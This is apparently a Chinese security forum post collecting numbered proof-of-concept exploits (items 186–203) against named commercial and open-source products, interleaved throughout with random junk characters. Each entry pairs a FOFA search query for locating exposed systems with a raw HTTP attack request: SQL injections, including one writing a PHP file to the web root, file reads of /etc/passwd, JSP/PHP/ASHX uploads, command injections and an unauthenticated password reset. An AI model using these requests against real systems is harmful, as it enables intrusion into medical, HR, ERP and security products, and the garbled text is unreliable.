* Q! S2 ~4 b8 y# BGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1) w: c. W, h* ^0 J l
Host: host( b4 Y8 c6 {2 X+ q' Q+ v
/ X! M* K' V* n9 n! I1 Q5 A& P) D- n: S8 c
186. F-logic DataCube3 SQL注入$ F, D8 R& S7 }! ]9 f
CVE-2024-31750
9 R. C/ o* S0 KF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统1 z' a5 j( [. p( y
FOFA:title=="DataCube3"
1 \3 m3 B( n6 E$ _5 [, J6 g9 ?* LPOST /admin/pr_monitor/getting_index_data.php HTTP/1.16 u$ c1 g7 J: a6 }
Host: your-ip e' M7 ^9 E$ t* E! r% l2 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0; g- n/ s$ J* |0 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8$ Y: J L+ P8 x( w x& }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
k" f7 f1 @% l& @+ r* t: IAccept-Encoding: gzip, deflate
# ?7 }1 n. K ]8 nConnection: close. {3 d( Q% G: f+ W
Content-Type: application/x-www-form-urlencoded! k/ N7 `. j# ^
* ]$ d, x" C9 m0 H/ treq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450% {. H/ l, u0 N
- ?3 K$ T. R) O! v
4 n' J o# M( K7 N
187. Mura CMS processAsyncObject SQL注入
% r* U4 a- Z7 v3 O4 H. ~& `: c0 Q: y" F+ TCVE-2024-32640
7 l' A6 x) T4 k6 W/ X+ E8 lFOFA:"Mura CMS"8 x3 k& A. m, g& ~+ N: k5 t
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
& |0 Y; S8 A, IHost: your-ip3 f$ o: F9 u+ M* {6 n* _3 J
Content-Type: application/x-www-form-urlencoded
0 Z4 L- g) b) k* Z, L. J# ]; @) E( k9 d: s
5 n) I! n/ {& P0 u" u# R5 P7 \
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
" N) L* E' i; t0 R. J8 S8 t p- { n5 ~/ G- ^' f' n
8 o3 O, G+ j! f& _
188. 叁体-佳会视频会议 attachment 任意文件读取
8 q% J* E5 W" L* Z) S5 q n, Wversion <= 3.9.7
1 V4 S) F& {1 \FOFA:body="/system/get_rtc_user_defined_info?site_id"8 {7 c: g6 M* S
GET /attachment?file=/etc/passwd HTTP/1.11 \9 f# R' @ r B+ v f( d* M j
Host: your-ip
/ S1 s) s. W! @; q$ w( G1 K; }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 ~' ]9 t! B7 Y7 G) Y( E: v1 ]% C" QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ k) r' U }- ^* b5 r- f( u b
Accept-Encoding: gzip, deflate
( O' v8 c# v, R& h' _. N2 W0 ]Accept-Language: zh-CN,zh;q=0.9,en;q=0.8" q9 p2 L0 I' T/ q% k7 r+ _+ y7 ]$ j
Connection: close% C; S6 v5 P( d: R: s
6 ~6 d8 o2 f8 x" B# j
) O _4 T( g* ]: c189. 蓝网科技临床浏览系统 deleteStudy SQL注入 W- A/ ]! g9 G) ? K; A- C( y
FOFA:app="LANWON-临床浏览系统"
" V- ]- O! w5 u/ \" L- H' SGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
' i# @, e: z: _/ xHost: your-ip
6 F7 v% D; o. v1 z2 GUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 F/ y( I7 }% {, u$ ^- NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" S+ S; f- b+ Q6 O! k" D+ i
Accept-Encoding: gzip, deflate
3 [/ U3 ^( c' [: EAccept-Language: zh-CN,zh;q=0.93 o ]7 B' O' P7 a* G. W
Connection: close* S9 B- N' A4 }' O& t
+ B/ Z2 s4 Z9 n1 I( C7 R1 H
7 y# @8 w4 D( z- i. o3 X190. 短视频矩阵营销系统 poihuoqu 任意文件读取9 f7 A5 G r5 `! B9 C* w7 U
FOFA:title=="短视频矩阵营销系统"0 G: Y: x7 D7 X B8 f' p2 [
POST /index.php/admin/Userinfo/poihuoqu HTTP/2$ E8 H& T6 Q/ F& g8 w' h
Host: your-ip( D2 X _ B) Z6 B/ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.368 C! ^) {. N0 k' \0 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
$ M5 r5 N/ r$ c+ _5 tContent-Type: application/x-www-form-urlencoded
- q, y8 W7 X: @$ B2 eAccept-Encoding: gzip, deflate
6 [ q; a- i; Z( X: GAccept-Language: zh-CN,zh;q=0.9+ R% z6 V" D# c+ R
7 U" E, a, J& [
poi=file:///etc/passwd
$ m( J" {4 t2 w0 |5 H" s. W _8 Z% @8 B* z1 `! f7 @
. |, V$ e, B% f) x' c7 P# {( |191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
: X2 ]- m6 G/ h/ L& f3 HFOFA:body="/CDGServer3/index.jsp"
: F/ z7 {' g6 uPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
' m4 R, I* w1 l1 J6 @8 V( Q/ P8 ~Host: your-ip, g* |7 P' ^" \. u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# R2 b2 w+ y& T, v
Content-Type: application/x-www-form-urlencoded
: S2 u; ], T" z: u
1 G, b0 |/ v* O, n4 vcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
# w) F L: Q* p% @9 ~: H3 f( r; s
1 D. m5 D1 T0 e) [6 H3 Y
, \3 z: G/ f0 j X; `192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
B* f0 ]) W/ [, x. u1 cFOFA:title="用户登录_富通天下外贸ERP"
8 r6 n. D3 v. Q- _POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
- |8 P z- N3 D; _! A7 hHost: your-ip
/ a- j$ a) ]$ gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% O/ E# B- J3 T' x
Content-Type: application/x-www-form-urlencoded
2 x, R6 H) I+ z4 } |
$ B+ ?7 q- g% l1 F' D" ~9 \
! Y" _# B' I; ^# M/ j2 J% p<% @ webhandler language="C#" class="AverageHandler" %>
1 W( e0 _! L8 _using System;
; _: [( z! ?8 M b+ d( Musing System.Web;
$ v! B$ d/ |- N- Tpublic class AverageHandler : IHttpHandler
" a/ [! X. e {/ g6 B- l) T{
- F& c/ t4 K6 h! b7 t% ^0 w$ D9 Upublic bool IsReusable
8 l/ v% O4 w$ \9 s; h2 g{ get { return true; } }
1 M- w0 O6 ^- s8 K- Epublic void ProcessRequest(HttpContext ctx)+ r0 @- M8 h1 }, O; Q' r0 d
{% _ i* l! |5 } w% A
ctx.Response.Write("test");2 P* Z1 X+ H7 P8 U! }
}* [+ q6 g% s8 T5 N# _7 |% ?1 k
}
3 ~6 j8 L8 w5 j6 p9 i; O9 e' ~& K7 e `' e( ^! }
$ E1 h* a! O H4 k/ y
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行& Z# a' q% [2 Q) q0 N8 ~6 W" @. f
FOFA:body="山石云鉴主机安全管理系统"
& O! [5 o1 i g$ Y) i/ d; PGET /master/ajaxActions/getTokenAction.php HTTP/1.1
( f! r* ]9 g7 F4 U! _Host:& K% {' O! h5 a- C# S @
Cookie: PHPSESSID=2333333333333;8 G4 a7 F' [ X8 n; ` _2 l
Content-Type: application/x-www-form-urlencoded
6 f. j8 j3 y* a! x6 L: G# b, JUser-Agent: Mozilla/5.04 `4 z5 B6 `- l& ?
+ I! X: m. {& F( f, u5 z8 E
0 f6 C2 `+ o8 k" C( x+ j/ @5 EPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1' w. d1 W" _- R& J
Host:+ z4 F7 P' B0 F3 N1 R* S, h. d
User-Agent: Mozilla/5.05 \+ j% ~" ?6 D% j. d0 [! ?. G
Accept-Encoding: gzip, deflate
* N# @7 p% B4 J& ]0 c" N0 m# M8 s# lAccept: */*4 Q* E5 w5 Z @1 T
Connection: close
6 `% g4 G( x- i3 ]( ?1 `Cookie: PHPSESSID=2333333333333;; w' _4 F" x6 j% G2 _
Content-Type: application/x-www-form-urlencoded, o. j! Y, Z! m" E i3 B
Content-Length: 84) W. S6 m/ F* I
9 S8 K/ ] O! _7 f4 ~2 X% B$ ?
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
% r# `3 t/ R" ^3 t/ r: R. ?# r4 [- p; Q6 S2 U, g+ ]
& c2 c# l. N2 |9 n& IGET /master/img/config HTTP/1.1$ D x! f8 Y% \ X5 x( M
Host:
! P; `. M9 \4 ]3 c: ~0 g+ ^User-Agent: Mozilla/5.0. G2 q/ y" x# p2 o$ ?
9 M/ Y! p4 u2 k9 V/ o _4 N) q# {4 }2 @ m0 G- y/ z4 s. T
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
; N. |4 A# h8 R) MFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在% B$ t/ k {1 w/ R+ f2 D
1 o' w0 V( q4 K: V7 S k- q7 B- P; FPOST /servlet/uploadAttachmentServlet HTTP/1.13 I+ ~5 t" p$ W4 L0 R/ k1 l3 h
Host: host
0 M5 Q# X" O6 j+ R" vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
6 f1 V5 d* A- f$ K$ k) Q! f# O& KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ a3 ]0 D9 M5 u- L" k4 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 a# x* ^: b" x
Accept-Encoding: gzip, deflate
! M8 E9 B8 M/ DConnection: close
' [' Q0 E$ p, }6 `5 zContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
" }' k9 O' R# \ t- n& A2 h------WebKitFormBoundaryKNt0t4vBe8cX9rZk
: k7 ?$ V5 y+ Z, o, m* E) T) b
8 T/ f9 y8 y* c1 X" LContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"3 O T9 G* l& j( ^/ ]" S
Content-Type: text/plain; `2 a* t8 x3 r5 A2 _
<% out.println("hello");%>
, ~& A( `- X4 v5 n' A7 K------WebKitFormBoundaryKNt0t4vBe8cX9rZk
2 E" P# N. V' rContent-Disposition: form-data; name="json"
# ?) j0 C% ?% z2 ^ {"iq":{"query":{"UpdateType":"mail"}}}
5 B, p& ?% ^/ f# T! ~1 {------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
4 ?4 G4 ]4 U6 u& i
8 s# w$ T" q8 x5 L. ?. s K0 f, m1 k* h, M* y% g7 G1 @
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行- m' f9 ]% J7 K \; y$ E& l
FOFA:title=="飞鱼星企业级智能上网行为管理系统7 ^: B( `. R* K" D u
POST /send_order.cgi?parameter=operation HTTP/1.11 D0 n J$ L5 q/ }% _" ^
Host: 127.0.0.1/ l. I4 R! ?5 J! x) z) o
Pragma: no-cache2 G' z& \* i4 q7 ^1 V7 s W
Cache-Control: no-cache
. ~8 x- ^" B% y; K: V. c+ eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.368 j! b( B9 p2 G2 q2 h9 R
Accept: */*5 N [8 W+ l) C$ S, w" S
Accept-Encoding: gzip, deflate: K3 V+ R7 E, m
Accept-Language: zh-CN,zh;q=0.9+ @. x$ [6 n% h1 M1 O: T
Connection: close
; g8 n3 r/ ^; X/ |5 a$ O1 h4 sContent-Type: application/x-www-form-urlencoded
5 T4 D3 u; \: j/ X E" k) u* F; C+ MContent-Length: 684 }: L+ E4 j/ D8 n4 ~" O
. X, d- b! m5 J$ d; B% F. ^) y2 Q{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
! c3 U7 p' |- f$ e# }: w q* @* \. I U) y2 T* |- s: ~
1 `$ k8 A/ s; Z( `+ ]0 |7 \196. 河南省风速科技统一认证平台密码重置" Q' u4 h! U! _7 V, k# a4 u
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"" L! x" F* c, g i" u/ x
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
- ~3 B5 l6 b6 G+ x4 J) q7 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" G/ W; W$ j7 j7 \
Content-Type: application/json;charset=UTF-8
0 U0 Y4 L! B3 g: J9 OX-Requested-With: XMLHttpRequest
/ i' @) ]; x7 O# THost:# q9 C$ U. G% G+ I
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2, p+ }3 i p4 J* i, x( }: x
Content-Length: 45# v9 M1 p0 h3 A! i5 w1 Z5 c
Connection: close
( O4 _& [/ A0 k" g! Y; \% a+ ^; H2 m2 [+ | [4 Z- O$ t U, I. i) g
{"xgh":"test","newPass":"test666","email":""}/ v2 e' M/ ~' n* {# z
9 i; |9 i$ D- O0 t& r) s5 f1 _1 [' l
5 Z1 d+ l& z- c# m' n3 z# z, u0 D G: p) h3 S7 A3 G F
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入* X# G& G* @ y4 k$ d5 y# B( S
FOFA:app="浙大恩特客户资源管理系统"
7 `) r T# J" v! r5 g1 o) MGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
" e. ?1 m& J. T3 L. P {) Q+ AHost:' u" }9 `" g2 v- P1 M3 D! q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
7 g' l- g6 k- c Y9 {' k9 _; lAccept-Encoding: gzip, deflate
' [; r+ D3 C6 X. N; [Connection: close* d( } i& B4 j( Y! w3 \- H
7 @1 t3 ?4 K7 [) V1 y" G. u
( m8 o7 ?! Z9 a* ?9 ]7 w! {( Q$ N/ Y2 \
198. 阿里云盘 WebDAV 命令注入) Y8 W. \9 @2 a5 U2 Z* b5 O$ |3 W8 {- g
CVE-2024-29640
" I% l9 x& x$ }0 y2 t; TGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
0 ~: K2 r; R' o# g. b* V9 KCookie: sysauth=41273cb2cffef0bb5d0653592624cf64 Z$ F D0 d* v3 `" ]
Accept: */*8 U# E& e! o5 T
Accept-Encoding: gzip, deflate
* T% O6 l% E6 dAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
3 T U( I* T. l% dConnection: close
/ g/ d' ^* x% ^8 o
3 F- c) _( M& J" h. a8 X1 [; M+ B Z# ~* Q$ D
199. cockpit系统assetsmanager_upload接口 文件上传
0 v# p" s8 n# z2 \/ {, q7 O1 u3 ^9 x8 `" ^. T. B1 l
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
( S- l/ K/ S, bGET /auth/login?to=/ HTTP/1.1$ ?& ?/ v: r6 E) M6 z
) T; n1 a+ B3 X$ f; O5 U! n ~
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
, ~# D: N6 H7 V, X6 y0 a- O. {. ], V- o5 { A5 k
2.使用刚才上一步获取到的jwt获取cookie:! N( s) n/ n1 V2 R- X
$ g# o, W; ?$ s1 F
POST /auth/check HTTP/1.1
5 X6 L+ E% ^* \' }Content-Type: application/json
2 P, ?! }/ y- V0 J; d
0 L) h U- Z5 z7 J+ A! q# z* z5 _{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
; [ g: d" e& G- b6 k. F
9 `$ k1 r. R0 I4 A6 f响应:200,返回值:4 S5 ~, Q; X, v! T. o. T2 ?% c# w0 z
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
$ {0 F2 Z% K7 oFofa:title="Authenticate Please!": b) W" ?$ w7 _3 S
POST /assetsmanager/upload HTTP/1.1
6 D5 X) E3 K, p+ R. [$ CContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3# J* W/ ^* |& O5 I
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
8 s0 |1 @- p: N8 Q
% K* d' [3 L# a% B u-----------------------------36D28FBc36bd6feE7Fb3, [4 y" x3 B' \9 R. [8 G% r, s
Content-Disposition: form-data; name="files[]"; filename="tttt.php"7 T5 y- |' e( p; N8 b5 _
Content-Type: text/php' W+ ]% A3 ]- k1 Q" l0 G
1 L0 j; {8 V4 v+ b u; U1 m<?php echo "tttt";unlink(__FILE__);?>
9 f/ l3 b; ?; E# q-----------------------------36D28FBc36bd6feE7Fb3- M6 C6 f- ]* ^9 E9 |: M& ]
Content-Disposition: form-data; name="folder"! N- H7 E9 o5 E; [4 O2 t
4 V9 q5 E9 n8 }- K% z
-----------------------------36D28FBc36bd6feE7Fb3-- @9 A" p' u/ Y
: L3 T c# p. G6 |2 Z3 R
; U" l2 S6 Q) ^$ v! A f/storage/uploads/tttt.php
7 K4 w2 t7 I2 h; @) Y4 d
6 W( ^, k. ~; }% w' c0 `200. SeaCMS海洋影视管理系统dmku SQL注入' E1 c5 i$ @- p
FOFA:app="海洋CMS"
, A) q2 C% b4 l$ hGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
4 a. V& t# L) v) K) A4 r7 XCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
" i$ x/ Q, c6 Y2 V" y; [7 \( JUpgrade-Insecure-Requests: 1" I! K* `, N/ P1 |4 [
Cache-Control: max-age=0
7 R7 |( ^- R- A* g8 ^3 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" p9 t, p7 R; f$ j# nAccept-Encoding: gzip, deflate
/ t+ r/ R+ _6 J( V4 S8 D$ EAccept-Language: zh-CN,zh;q=0.9; |1 g9 P8 P* G# a6 j
! v' C( P' Y/ {' W* y: H& Q# G3 m" F( i. _3 h1 N! E7 u7 S7 v" v
201. 方正全媒体新闻采编系统 binary SQL注入% y4 l: w7 M$ H8 z9 Z
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
. A: F D D3 ~/ @1 m' Z; Q$ c6 ZPOST /newsedit/newsplan/task/binary.do HTTP/1.1
6 J+ k7 t2 O! e) V# X2 Z8 ]Content-Type: application/x-www-form-urlencoded
! |; {5 ] `" q8 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: i! C6 o8 H, q4 A& GAccept-Encoding: gzip, deflate
8 T: h, N+ F+ ^" KAccept-Language: zh-CN,zh;q=0.9
2 I/ m6 j/ w3 tConnection: close
) C4 E/ D8 u1 Y5 q3 I0 W+ t0 D+ c8 Z% j: `
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
0 h; A- u: ? s, Q) G0 b
! \ K$ R+ ^0 u- b
4 ~' {0 n2 ?+ F1 C3 Z$ d202. 微擎系统 AccountEdit任意文件上传8 u; A3 z$ L+ ^7 i# U1 h
FOFA:body="/Widgets/WidgetCollection/"7 M5 M+ o/ G6 o6 p0 `( y8 u
获取__VIEWSTATE和__EVENTVALIDATION值
0 B3 G( @$ S, m' @* [% \' jGET /User/AccountEdit.aspx HTTP/1.10 w1 x/ G5 l6 @
Host: 滑板人之家
8 t0 S' c& a- W' u% A4 n! P3 H4 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31( [6 }2 F2 T6 r+ }- n
Content-Length: 0: H P' b+ G* \/ B* Q
% T' o8 c2 q# v: R8 m( j5 c+ r2 f
$ x* T8 L+ {* I% x替换__VIEWSTATE和__EVENTVALIDATION值
) b& U0 J! \" N' w, mPOST /User/AccountEdit.aspx HTTP/1.16 @6 H0 A9 R- e$ B u. m, I9 l6 Y
Accept-Encoding: gzip, deflate, br/ O5 k$ Q8 O6 E+ M1 Y
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
8 k; f9 H" H) h* x# U: l5 T# b' e4 ]/ |+ t' U4 G& G) c
-----------------------------786435874t38587593865736587346567358735687
4 w2 Q1 B6 x( UContent-Disposition: form-data; name="__VIEWSTATE"& g# D) Q4 W4 t- Y: F
: W3 O" p9 {7 L
__VIEWSTATE2 ^# X2 ^2 B0 v( U- {! D3 K
-----------------------------786435874t38587593865736587346567358735687/ P5 q+ k; Q9 h% `
Content-Disposition: form-data; name="__EVENTVALIDATION"
$ e3 w' ^- U, @7 r; A$ I$ F0 q% C5 R/ P' t
__EVENTVALIDATION
" H* v- u! }) n- C-----------------------------786435874t38587593865736587346567358735687
) o* s# z* W2 N. K0 sContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
+ E5 \# P# `) J bContent-Type: text/plain" B& M) j4 u' E) n6 {
# q' B6 R* l3 B3 P; q9 R
Hello World!# ^5 m/ b8 ?: m3 d
-----------------------------786435874t38587593865736587346567358735687" H( U# h1 P" \- f" N
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
) B6 ?, l( u' Y4 h4 N! D: k0 _) R, M; w2 S3 \- H, ]
上传图片6 |2 J! Y- `6 c' A: R
-----------------------------786435874t385875938657365873465673587356878 Z. C) ^% X) m( |
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
) U9 X* d( H+ p0 g
A$ I# _$ V/ g
7 G$ M, W9 K. e: y1 s# C; Y-----------------------------786435874t38587593865736587346567358735687
9 G$ A- ^7 K4 l1 \4 m8 c( U$ wContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
% U3 b- H+ G2 B1 p4 J( g
1 A. U w" Y5 a, Y
. X4 s$ N& T! P7 \* {1 y; J6 @' j-----------------------------786435874t38587593865736587346567358735687--
+ X% C8 U. v' K" x& i5 Z o1 {/ g+ r# |2 k' B- z
- |3 B" q+ X: G( H4 s# j0 I& q/_data/Uploads/1123.txt
/ o! \2 o% Y4 c8 X
# w' ^7 [9 H4 f203. 红海云EHR PtFjk 文件上传- N. g9 o( r& R2 P
FOFA:body="RedseaPlatform"
; `4 d9 y9 Z) m3 E' lPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1, }% J$ f) D" ~# q3 n4 J! N
Host: x.x.x.x
6 U" [% w+ ~$ y( T! N/ b- I( x. \8 EAccept-Encoding: gzip- `2 r- C, F0 I' t) r1 z# u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! M* {% o! j7 r+ t/ ]$ [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys49 g0 A8 k7 Y9 Y% Z7 ^
Content-Length: 210
- c! m3 R% f: P6 t* H9 S; M8 ^# V
1 H2 |" G( A4 g: _5 i------WebKitFormBoundaryt7WbDl1tXogoZys4
+ A4 }" Z) _ W" @Content-Disposition: form-data; name="fj_file"; filename="11.jsp"* c; |& V8 k' _- j4 A
Content-Type:image/jpeg" m; i. J& l; [1 b, K1 G6 f
/ g- P* G- v; I' ?- o
<% out.print("hello,eHR");%>
" e* E% `! \( h2 F/ Y* a- |------WebKitFormBoundaryt7WbDl1tXogoZys4--7 _$ o- W7 n- I- E9 N' [* S' N4 A$ `
! o" l6 e+ _! a3 o% p: ~
3 f' o( s" N$ j4 X" i; f2 x2 C
8 K& j( J. i' j8 `
: t. r5 J. ?( N4 Q. J& j
# G' m: ?5 ]% N" P- D8 u# a" V* S; l) L
|
发表于 2024-6-5 14:31:29
收藏
支持
反对